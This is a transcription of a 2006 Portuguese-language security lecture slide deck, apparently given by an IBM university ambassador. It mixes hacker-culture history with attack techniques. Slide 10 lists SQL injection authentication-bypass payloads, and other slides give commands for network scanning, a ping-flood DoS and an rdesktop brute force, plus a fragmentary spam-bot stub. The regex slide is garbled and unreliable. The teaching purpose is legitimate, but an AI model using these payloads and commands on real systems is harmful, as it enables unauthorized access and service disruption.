Elementos de Segurança da Informação em ambientes heterogêneos

Transcrição

1 Elementos de Segurança da Informação em ambientes heterogêneos IBM IT Specialist University Ambassador 11/02/06

2 Conceito A melhor maneira de se conhecer as armas de nosso oponente é usando-as! O feito de Alan Turing 2

3 O que são ambientes heterogêneos Repositórios de informações que podem ser acessados pelos seguintes meios: Meio físico Telefonia Rádio Rede 3

4 O que vamos caçar hoje? (As intenções de um ataque) Indisponibilizar um servidor Desfigurar uma página Desviar recursos computacionais/rede Redirecionar tráfego Roubar dados Modificar dados 4

5 Escolham suas armas Brute-force DoS Hardware Exploits Software Exploits DNS flood SQL injection Remote file inclusion Buffer overflow Engenharia social Shell code Ambientes Remoto Local 5

6 Como o campo de batalha foi formado? Guerra-Fria, Corrida Espacial e Internet Telefonia A necessidade de se computar dados em grande escala em Rede (O Unix nasce) A necessidade de se computar dados em pequena escala (O Microcomputador nasce) As Lições do IBM PC (Uma plataforma única, patenteada que se tornou um padrão livre de hardware independente de software.) As Lições da Apple (Uma plataforma única, patenteada, um conjunto inovador de hadware e software) As lições da Microsoft e o novo modelo de negócios da Micro-Computação (Vendas baseadas em licenças de uso e patentes em software) O Unix volta a cena A necessidade de se computar dados em pequena escala em Rede! O novo horizonte 6

7 O novo horizonte O surgimento do GNU (Richard Stallman) A necessidade de um kernel O surgimento da Internet (Tim Berners-Lee) O surgimento do Linux (Linus Torvalds) A Ética Hacker e o Open-Source (Eric Raymond) Catedral e Bazar A liberdade incondicional sobre a propriedade A necessidade de novas linguagems (Perl, Java, Python, PHP) *Ver timeline das linguagens 7

8 A Cultura Hacker e a Terceira Onda A liberdade incondicional sobre a propriedade O livre acesso a informação O trabalho colaborativo entre quem tem algo a agregar A estratégia Open-Source chega aos grandes players: IBM, SUN, Oracle, HP, Novell O modelo de negócios off-shore O home-office Os direitos autorais Copyright law is totally out of date. It is a Gutenberg artifact. Since it is a reactive process, it will probably have to break down completely before it is corrected. Nicholas Negroponte {Being Digital} 8

9 Rastrear Farejar e Monitorar nmap (nmap -v -ss -O /16) fping perl -e ' for (1..254) {print $_\n } ' fping -a -q 2>/dev/null nessus scanlogd ethereal ethercap cain 9

10 SQL Injection Nada mais simples que isso: SELECT fieldlist FROM table WHERE id = 23 OR 1=1 Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int. /index.asp, line 5 admin'-- ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a 10

11 Remote file injection vikov.htm 11

12 Exemplo de expressão regular (?: -)*[a-za-z\d])?)\. )*(?:[a-za-z](?:(?:[a-za-z\d] -)*[a-za-z\d])?)) (?:(?:\d+)(?:\. (?:\d+) ){3}))(?::(?:\d+))?)(?:/(?:(?:(?:(?:[a-zA-Z\d$\-_.+!*'(),] (?:%[a-fa-f \d]{2})) (?:% [a-fa-f\d]{ 2})) (?:%[a-fa-f\d]{ 2})) (?:ftp://(?:(?:(?:(?:(?:[a-za- Z\d$\-_.+!*'(),] (? :%[a-fa-f\d]{2})) [;?&=])*)(?::(?:(?:(?:[a-za-z\d$\-_.+!*'(),] (?:%[a- fa-f\d]{2})) - )*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?:[a-za-z\d] -)*[a-za-z\d])?)) (?:(? :\d+)(?:\.(?:\d+)){3}))(?::(?:\d+))?))(?:/ (?:(?:(?:(?:[a-za-z\d$\-_.+! *'(),] (?:%[a-fa-f\d]{2})) (?:%[a-fa-f\d]{2})) (?:;type=[aidaid])?)?) (?:news:(?: (?:(?:(?:[a-za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2})) Z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?:[ a-za-z\d] -)*[a-za-z\d])?)) (?:(?:\d+)(?:\.(?:\d+)){3}))) (?:[a-za-z](?:[a-za-z\d] [_.+-])*) \*)) (?:nntp://(?:(?:(?:(?:(?:[a-za-z\d](?:(?:[ a-za-z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?:[a-za-z\d] -)*[a-za-z\d ])?)) (?:(?:\d+) (?:\.(?:\d+)){3}))(?::(?:\d+))?)/(?:[a-za-z](?:[a-za-z \d] [_.+-])*)(?:/(?:\d+))?) (?:telnet://(?:(?:(?:(?:(?:[a-za-z\d$\-_.+!*'(),] (?:%[afa-f\d]{2})) [;?&=])*)(?::(?:(?:(?:[a-za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2})) -za- Z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?:[a-za-z\d] -)*[a-za-z\d] )?)) (?:(?:\d+)(?:\.(?:\d+)){3}))(?::(?:\d+))?))/?) (?:gopher://(?:(?: (?:(?:(?:[a-za-z\d](?:(?:[a-za-z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?: (?:[a-za-z\d] -)*[a-za-z\d])?)) (?:(?:\d+)(?:\.(?:\d+)){3}))(?:: (?:\d+ (?:%[a-fa-f\d]{2}))(?:(?:(?:[ (?:%[a-fa-f\d]{2}))*)(?:%09 (?:(?:(?:[a-za -Z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2})) \-_.+!*'(),;/?:@&=] (?:%[a-fa-f\d]{2})) *))?)?)?)?) (?:wais://(?:(?:(?: (?:(?:[a-za-z\d](?:(?:[a-za-z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?: [a-za-z\d] -)*[a-za-z\d])?)) (?: (?:\d+)(?:\.(?:\d+)){3}))(?::(?:\d+))? )/(?:(?:[a-za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2}))*)(?:(?:/(?:(?:[a-za -Z\d$\-_.+!*'(),] (?:%[a-fa- F\d]{2}))*)/(?:(?:[a-zA-Z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2}))*)) \?(?:(?:(?:[a-za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d] {2})) (?:mailto:(?:(?:[a-za-z\d$\-_.+!*'(),;/?:@&=] (?:% [a-fa-f\d]{2}))+)) (?:file://(?:(?:(?:(?:(?:[a-za-z\d](?:(?:[a-za-z\d] -)*[a-za- Z\d])?)\.)*(?:[a-zA-Z](?:(?:[a-zA-Z\d] -)*[a-za-z\d])?)) (?: (?:\d+)(?:\.(?:\d+)){3})) localhost)?/(?:(?:(?:(?:[a-za-z\d$\-_.+!*'(),] (?:% [a-fa-f\d]{2})) (?:%[a-fa-f\d]{2})) (?:prospero://(?:(?:(?:(?:(?:[a-za-z \d](?:(?:[a-za-z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?:[a-za-z\d] -) *[a-za-z\d])?)) (?:(?:\d+)(?:\.(?:\d+)){3}))(?::(?:\d+))?)/(?:(?:(?: (? :[a-za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2})) za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2})) (?:(?:[ a-za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2})) $\-_.+!*'(),] (?:%[a-fa-f\d]{2})) (?:ldap:// (?:(?:(?:(?: (?:(?:[a-za-z\d](?:(?:[a-za-z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?: [a-za-z\d] -)*[a-za-z\d])?)) (?:(?:\d+)(?:\.(?:\d+)) {3}))(?::(?:\d+))? ))?/(?:(?:(?:(?:(?:(?:(?:[a-za-z\d] %(?:3\d [46][a-fA-F\d] [57][Aa\d]) ) (?:%20))+ (?:OID oid)\.(?:(?:\d+)(?:\. (?:\d+))*))(?:(?:%0[aa])?(?:%2 0)*)=(?:(?:%0[Aa])?(?:%20)*))?(?:(?:[a-zA-Z\d$\-_.+!*'(),] (?:%[a-fa-f \d]{2}))*))(?:(?:(?:%0[aa])? (?:%20)*)\+(?:(?:%0[Aa])?(?:%20)*)(?:(?:(? :(?:(?:[a-za-z\d] %(?:3\d [46][a-fA-F\d] [57][Aa\d])) (?:%20))+ (?:OID oid)\.(?: (?:\d+)/])+)))?)) )?) (?:nfs:(?:(?://(?:(?:(?:(?:(?:[a-za-z\d](?:(?:[a-za-z\d] -)*[a-za- Z\d])?)\.)*(?:[a-zA-Z](?:(?:[a-zA-Z\d] -)*[a-za-a- F\d]{2}) [:@&=+])*))*)?)))... 12

13 SPAM bot public class attack { } public static void main(string[] args) { String url = " ne@none.com"; } doitagain doit = new doitagain(5,url); doit.init(); Nome: Mensagem: Submit 13

14 DoS Objetivo: Esgotar a capacidade de entrega de um servidor ping -f -s n <host> 14

15 Exemplo de Brute Force rdesktop -u Administrator -p words.txt <host> 15

16 Redirecionamento de DNS Rasterar portas Encontrar vítima (Access Point) Capturar os dados Explorar falha Mudar DNS primário Mudar os hosts internos Logar tráfego do DNS primário Analisar logs e escolher alvo 16

17 WiFi e a onda de insegurança Decriptar WEP Rastrear: Kismet Netstumbler 17

18 A versatilidade do kernel emacs gzip nano Hardware I/O Processador bash Memória gcc ncurses 18

19 Meu ambiente de testes: Seu ambiente de testes deve ser semelhante ao do seu oponente 19

20 Considerações finais Antes de tudo, seja um bom programador, Conheça bem SQL, Domine infraestrutura de redes ethernet, saiba montar e administrar seus próprios servidores Linux. 20

21 Dúvidas? 11/02/06

22 Thank You! 11/02/06